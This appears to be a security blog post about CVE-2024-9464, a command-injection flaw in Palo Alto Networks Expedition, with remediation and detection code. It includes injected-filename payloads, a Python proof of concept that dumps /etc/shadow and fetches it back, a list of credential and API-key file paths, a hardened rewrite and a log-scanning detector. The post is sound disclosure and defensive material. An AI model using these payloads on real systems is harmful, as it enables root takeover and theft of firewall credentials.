CVE-2024-9464 is a serious security flaw discovered in Palo Alto Networks’ Expedition migration and analysis tool. If you use Expedition (before version 1.2.128), you’re at risk: this vulnerability lets attackers with credentials execute any operating system command as _root_. What’s worse? Attackers can steal usernames, cleartext passwords, device configurations, and even API keys from PAN-OS firewalls — all with a few crafted requests.
This post explains how CVE-2024-9464 works, why it’s dangerous, and shows you example exploit code so you can understand what’s at stake.
What Is Expedition?
Expedition helps network engineers migrate configurations to PAN-OS devices. It runs on Linux and often has sensitive info for multiple firewalls (think: credentials, config files). Find official info here:
- Palo Alto Networks Expedition Site
- CVE-2024-9464 at NVD
How Does CVE-2024-9464 Happen?
The root of the issue is poor input sanitization in Expedition’s web interface components. An attacker who logs into the web panel (even with a low-privilege account) can craft requests that smuggle shell metacharacters and commands into parameters the application passes to an OS shell, typically as arguments to Python helper scripts.
Why Is This So Dangerous?
Because Expedition runs everything as _root_, any command injected this way is executed by the most privileged account on the system. This means:
- An attacker can directly read files like /etc/passwd or the Expedition SQLite/MySQL databases that hold device credentials and keys.
Example: Exploiting CVE-2024-9464
Let’s go through a theoretical (but realistic) example. Assume Expedition has an API for running migration “jobs” where user-provided parameters are passed straight to a shell command.
Note: Below is a recreation for education — actual request formats may differ.
Discovery Phase
An attacker registers or compromises an account and logs into Expedition. They notice that certain functionality takes user input and runs it through an OS shell. For example:
```python
import os

def run_config_migration(config_filename):
    # config_filename comes straight from the request and is interpolated
    # into a shell command line; os.system() hands it to /bin/sh unquoted.
    cmd = f"/usr/bin/python3 migrate.py --config {config_filename}"
    os.system(cmd)
```
If the app does not sanitize config_filename, a malicious filename could be:

```text
myconfig.xml; cat /etc/passwd > /tmp/leaked
```

This causes the shell to run:

```text
/usr/bin/python3 migrate.py --config myconfig.xml; cat /etc/passwd > /tmp/leaked
```

Now /tmp/leaked contains the list of all user accounts on the system.
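The hardened counterpart to the snippet above, as an added example that is not Expedition’s code and not from the original post: the filename is checked against an allowlist before use, and the migration script is launched through subprocess with an argument list, so no shell ever parses the parameter. The job directory /opt/expedition/jobs, the filename pattern and the function names are assumptions made for illustration.

```python
import re
import subprocess
from pathlib import Path

# Assumed for this example: the directory holding uploaded job configs and the
# filename shape we are willing to accept. Neither is Expedition's real layout.
CONFIG_DIR = Path("/opt/expedition/jobs")
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}\.xml$")


def validate_config_filename(config_filename):
    """Allowlist check: a bare .xml filename, no path separators, no shell operators.

    Anything the pattern does not match is rejected outright. We never try to
    'clean' the input, because stripping characters still leaves the shell in
    the loop somewhere else.
    """
    if not SAFE_NAME.fullmatch(config_filename):
        raise ValueError(f"rejected config filename: {config_filename!r}")
    # Defence in depth: the resolved path must still sit directly in CONFIG_DIR.
    resolved = (CONFIG_DIR / config_filename).resolve()
    if resolved.parent != CONFIG_DIR.resolve():
        raise ValueError("config filename escapes the job directory")
    return config_filename


def build_migration_argv(config_filename):
    """Build the argument vector for migrate.py without ever touching a shell.

    Each list element reaches execve() as one argv entry, so ';', '|', '>' and
    friends in the filename would be plain bytes in an argument, not operators.
    The allowlist above rejects them anyway.
    """
    name = validate_config_filename(config_filename)
    return ["/usr/bin/python3", "migrate.py", "--config", str(CONFIG_DIR / name)]


def run_config_migration(config_filename):
    """Hardened replacement for the os.system() version: validated input, no shell."""
    argv = build_migration_argv(config_filename)
    result = subprocess.run(argv, check=False, capture_output=True, text=True)
    return result.returncode


if __name__ == "__main__":
    # The second name is the injected filename from the walkthrough above.
    for name in ("myconfig.xml", "myconfig.xml; cat /etc/passwd > /tmp/leaked"):
        try:
            print("accepted:", build_migration_argv(name))
        except ValueError as exc:
            print("rejected:", exc)
```

Running the file shows the injected filename from the walkthrough being rejected with a ValueError before anything executes, while a plain name is accepted. The list form of subprocess.run is the real fix; the allowlist is defence in depth against path tricks and against a later refactor that reintroduces a shell. An allowlist is preferred over a denylist of characters because a denylist has to enumerate every operator in every quoting context the shell supports.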
Exploit (Python PoC)
This example assumes you have a session cookie after authenticating.
```python
import requests

# Change these:
url = "https://<expedition-host>/api/migrate"
session_cookie = "YOUR_EXPEDITION_SESSION_COOKIE"

# Malicious payload to read /etc/shadow (hashed passwords)
malicious_filename = "foo.xml; cat /etc/shadow > /tmp/pwned.txt"

# The injected filename is sent as the config_file parameter of a migration job
data = {
    "config_file": malicious_filename,
    "other_param": "value"
}
headers = {
    "Cookie": session_cookie
}

response = requests.post(url, data=data, headers=headers)

if response.ok:
    print("Injected payload, now fetching results...")
    # Fetch exfiltrated file
    leaked = requests.get(
        "https://<expedition-host>/static/tmp/pwned.txt",
        headers=headers,
        verify=False
    )
    print(leaked.text)
else:
    print("Error sending exploit")
```
Remember: this is for demonstration only. Actual attack vectors may use different endpoints or parameters.
What Data Can Be Stolen?
- /home/user/expedition-beta/database/db.sqlite — Contains device admin usernames/passwords
- /home/user/expedition-beta/API_KEYS/ — PAN-OS API keys
- Firewall config backups/config files
- Expedition web user credentials
Attackers can then use this info to compromise firewalls and orchestrate advanced attacks.
Update Expedition to 1.2.128 or later as soon as possible.
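Alongside patching, a defender can look back through application logs for the kind of request the exploit section describes. The following is an added example, not part of the original post and not Expedition’s own tooling: it scans job-submission log lines for shell metacharacters in the config_file parameter, and for follow-up downloads from the /static/tmp/ path that the PoC above retrieves its output from. The log layout and every line in SAMPLE_LOG are constructed for this example; Expedition’s real log format is not shown on this page, so LINE_RE must be adapted to your own logs.

```python
import re
from dataclasses import dataclass

# Constructed sample lines for this example. The layout
# "<ts> user=<u> job=<j> config_file|path="<v>" status=<s>" is an assumption
# made for illustration, not Expedition's real log format.
SAMPLE_LOG = """\
2024-10-09T17:15:20Z user=alice job=migrate config_file="site-a.xml" status=200
2024-10-09T17:16:02Z user=bob job=migrate config_file="foo.xml; cat /etc/shadow > /tmp/pwned.txt" status=200
2024-10-09T17:16:09Z user=bob job=fetch path="/static/tmp/pwned.txt" status=200
2024-10-09T17:17:45Z user=carol job=migrate config_file="branch-2.xml" status=200
2024-10-09T17:18:10Z user=bob job=migrate config_file="x.xml|id>/tmp/o" status=500
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) job=(?P<job>\S+) '
    r'(?P<key>config_file|path)="(?P<value>[^"]*)" status=(?P<status>\d+)$'
)
# Shell operators that have no business in a configuration filename.
META = re.compile(r'[;&|`<>]|\$\(')


@dataclass
class Finding:
    ts: str
    user: str
    reason: str
    value: str


def scan_lines(lines):
    """Return one Finding per suspicious line; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        f = m.groupdict()
        if f["key"] == "config_file" and META.search(f["value"]):
            findings.append(Finding(f["ts"], f["user"],
                                    "shell metacharacter in config_file", f["value"]))
        elif f["key"] == "path" and f["value"].startswith("/static/tmp/"):
            # The PoC reads its dumped file back through the static web root.
            findings.append(Finding(f["ts"], f["user"],
                                    "download from /static/tmp/ under the web root", f["value"]))
    return findings


def users_to_investigate(lines):
    """Distinct accounts behind any finding; these sessions and their secrets need review."""
    return sorted({f.user for f in scan_lines(lines)})


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG.splitlines()):
        print(f"{finding.ts} {finding.user:<6} {finding.reason}: {finding.value!r}")
    print("investigate:", users_to_investigate(SAMPLE_LOG.splitlines()))
```

A hit on the config_file check is strong evidence of an attempt regardless of the HTTP status, because the command runs before the migration script reports success or failure; a status=500 line is still a hit. Any account that appears in the findings should have its Expedition session invalidated, and the firewall credentials and PAN-OS API keys listed above should be rotated on the assumption they were read.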
References
- Palo Alto Networks Security Advisory
- NVD Entry for CVE-2024-9464
- Expedition Documentation
Conclusion
CVE-2024-9464 is as critical as it gets for anyone using Expedition. With just an internal credential, attackers can take over the system and loot sensitive firewall credentials. Patch now. Rotate your secrets. And always remember: never trust user input in your scripts!
If you found this helpful, please share it with your IT team and stay secure.
Timeline
Published on: 10/09/2024 17:15:20 UTC
Last modified on: 10/18/2024 11:49:42 UTC